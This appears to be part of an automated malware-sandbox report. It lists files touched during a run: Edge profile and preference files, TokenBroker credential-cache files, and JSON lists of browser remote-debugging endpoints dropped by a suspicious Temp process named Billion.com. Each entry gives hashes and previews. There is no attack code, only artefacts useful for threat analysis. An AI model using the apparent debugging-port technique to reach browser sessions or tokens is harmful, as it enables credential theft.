                                                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:uriCache_

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0008771611613065
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQ+J:YWLSGTt1o9LuLgfGBPAzkVj/T8lQ+J
                                                                                                                                                                                                                                                                                                        MD5:B4FCDDC61D5B74EF98B0CD47B29AD141
                                                                                                                                                                                                                                                                                                        SHA1:FBC310CEC7CB4FAFAC9138167231FDF970B6A11E
                                                                                                                                                                                                                                                                                                        SHA-256:1FDB27B0FB7851DC15058F0ADE731F0876A43FB0E231F543CE61E2DD3B321B34
                                                                                                                                                                                                                                                                                                        SHA-512:C6565C3D37DE3F77BFDD71A31072F7468D2F4BFDE4D9AF2DCDCE505000309F87AFF3863BBF38C219934E2E27D38E432C1E0F0A068C4332D9B49671E3C597EF37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735165705782207}]}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                        MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                        SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                        SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                        SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a0493319-ead7-4610-abdb-9f48cf181c35.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44922
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094890164157997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vV90D0sFLEVKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t7KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:B6486EDCFE7EC256465FBD94C65151CC
                                                                                                                                                                                                                                                                                                        SHA1:6AB9889AA6D83CCFA04862D8E07DDCF31517038B
                                                                                                                                                                                                                                                                                                        SHA-256:3A90483165D0E00667819A4FC2921CD8DEE4CA876BFBA2225E8D5020BED5E26D
                                                                                                                                                                                                                                                                                                        SHA-512:6A051F288452EFCC863D1622BA82F279BB7C1A1F7AD47BCED199CAF09FA4FC12186FFC0AA823C80C77A1E103421CEE6C8984016715004FC82A1F67454B5CF503
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f40236e8-fe9b-4c35-a018-31eb490e011c.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):46144
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0874474098903555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:qMkbJrT8IeQc5dKH1ki1zNt9Xi9vVx+DzJ6PRLv9N2aPeCiozJDSgzMMd6qD47uW:qMk1rT8H1KzXi9tD98aPeFoztSmd6qEL
                                                                                                                                                                                                                                                                                                        MD5:9C9C3B1DF31DE1100253C096BFA50357
                                                                                                                                                                                                                                                                                                        SHA1:4E1893DCE27F314071091F3155E3FA5BB3E4DDE5
                                                                                                                                                                                                                                                                                                        SHA-256:9A2D4310003F537C6D1B9A3AFA34C46624D9795B3BEB914728E3D0D61F173949
                                                                                                                                                                                                                                                                                                        SHA-512:6641CE6FF4DE61580B16B60AE8D15B63FEE233809794B79193414D2E2F54851D9A1DE948999857099161198B4793C0FF52867C97291096F2E3C90623A4774240
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379538500667114","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"b801fd64-6919-4229-a38a-8914add27428"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fdb62123-bd86-4ab9-b1eb-1d1bca17f82e.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095030682540709
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVxwxNQsPeGKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t0KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:C5C719D948684AC649D09EBFD8719922
                                                                                                                                                                                                                                                                                                        SHA1:4E4278B3BDFD4A715FE933EE68F70CBC87CF20B9
                                                                                                                                                                                                                                                                                                        SHA-256:912D6E164AF3574D21FBB491572620C055842B1C0241E1C6A5D35964F2E9E2C2
                                                                                                                                                                                                                                                                                                        SHA-512:019A88D2522646436A138D847C37AF1406B493FE869EEFD10AEB83952EFAD7CA2B393A8001AF7B64E9EDA5F695615ABAACF30B6FFBCCBBE753EEF83244B80F0E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.832920425157591
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxgJxl9Il8uwxYy50owhInigtpPhO0z794Fgtwed1rc:mxYCl0oDDhDz79ogtY
                                                                                                                                                                                                                                                                                                        MD5:AAD6DE7903575937FD8C6475F23AC1D8
                                                                                                                                                                                                                                                                                                        SHA1:843BAE1748ECE0D154475CA2442500C4DDAB44A2
                                                                                                                                                                                                                                                                                                        SHA-256:E9D2F47EDF284BA4527DA014C4EAD04DD0C9819C170136836C94DD97EADA1C28
                                                                                                                                                                                                                                                                                                        SHA-512:2B685CF246336DB37197F4FE3F809E63DAD336567C294938C29CA7458B035903FC2FF02C6FFB0E554057F32A475855119684CC719C7D5F184EA54C9BFC5066E2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.y.p./.z.l.W.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.998381659033429
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxEx2xD9Il8uwHzRYHAShZjSUq86mIRlwR4SH939RAh2wpPSoGHIJRNqBq1:MYCHzWhZlQmIzTSHBG9pP1G2RNqELKU
                                                                                                                                                                                                                                                                                                        MD5:B8E320C662F6571ABD870518E1FA5B66
                                                                                                                                                                                                                                                                                                        SHA1:54D4085783ABB71B1D7F0196858AC76321824891
                                                                                                                                                                                                                                                                                                        SHA-256:AFCC40EC79AF85F89C67C40FA993243B00F1D9D8DD6479C69F905CAACA0FBFE3
                                                                                                                                                                                                                                                                                                        SHA-512:CBF715F0452C4D3479D6447E7AAD79B84F9E7F80447F1B0F40D49D5B52BD9CBCB9465C569467DA7A535C128AE12F8787160CA776ED7CE528EE7F1A2E09ECB9E2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.n.Y.r.5.T.F.W.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9015110636720447
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7xDxl9Il8uwyprMm2YnAcRst9WyYAvCBURb406yg4d/vc:a9YC6rlbpRKPfCyRkby8
                                                                                                                                                                                                                                                                                                        MD5:76E7159FD85A75AD5207A5F490638838
                                                                                                                                                                                                                                                                                                        SHA1:BCD064F8E6548AB9E920CF87ECA02154AA176339
                                                                                                                                                                                                                                                                                                        SHA-256:74EA6E01B36C31DCB9702F52FA3B773B1825DD5CB5B4E5550A2649D62D6A189B
                                                                                                                                                                                                                                                                                                        SHA-512:C51C3FB9B491552A2074D7D5C8F49C54860C51E21BE5581095816A078104F7FC32F4D773927885D52161AC6E4BEE49674664C494814996E3E49932296B1451C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".i.R.T.w.F.A.N.1.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.39890703624068
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:6NnCmHCZNnCGyqyAbCGyjNnC019C0TNnCBdgECnXNnC8CsNnCwDCqNnCEwC3NnCB:6N+NQNHzTNqsNXNHnNlBN0
                                                                                                                                                                                                                                                                                                        MD5:5099EB601185ECCA2BA0A40DBEF17143
                                                                                                                                                                                                                                                                                                        SHA1:5D976D38761BBEC3F5F823481883871EF0B9D037
                                                                                                                                                                                                                                                                                                        SHA-256:AD86618A86D0BCDFDF78321F39EDE0343E194B49FD5402F937DCB1DDD860DCD6
                                                                                                                                                                                                                                                                                                        SHA-512:4FDACE36C8575F0E4B336E629DCAF2AE655A5E4D6407A28D2DECF96E26727E8046F9AD9059D6A713A904A304CC26F37E569643029BA6CC4CDA675A9A7E4EEE64
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A6B2562C87BA14D7904D8758DC2AB460",.. "id": "A6B2562C87BA14D7904D8758DC2AB460",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A6B2562C87BA14D7904D8758DC2AB460"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/53706A962C461BAF008E7099F068F49A",.. "id": "53706A962C461BAF008E7099F068F49A",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/53706A962C461BAF008E7099F068F49A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.375842119465089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:SfNaoCpTECqfNaoC32VC3EFfNaoCdCOfNaoCdE/0UrU0U8CdQ:6NnCpTECyNnCAC0NnCdC2NnCdE/0UrUw
                                                                                                                                                                                                                                                                                                        MD5:1E908A5E6B8932061D7EB1DB0687B48F
                                                                                                                                                                                                                                                                                                        SHA1:A42F9BA3DE1F8A4CDD3ACD8F8E160295AD47286D
                                                                                                                                                                                                                                                                                                        SHA-256:E29A72D47957AF386B83B00C8D13E8CEE0BC885423D896A51E695AAD1E2E2F41
                                                                                                                                                                                                                                                                                                        SHA-512:EB3F9DBEAF57A9B8504945DEFD5DB4D8D9ABC45049208475510A3E9E21CB5F464EE7BA05FC1B744A78BD8EFA0681170664CED6308D797A780D82487D50E0A210
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/401A23DE61B58623DBEAF6684095577A",.. "id": "401A23DE61B58623DBEAF6684095577A",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/401A23DE61B58623DBEAF6684095577A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4423C63AF688424E9B0193C76229585C",.. "id": "4423C63AF688424E9B0193C76229585C",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4423C63AF688424E9B0193C76229585C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0b549178-a9e6-4709-bc11-2ae1b28b5fd2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
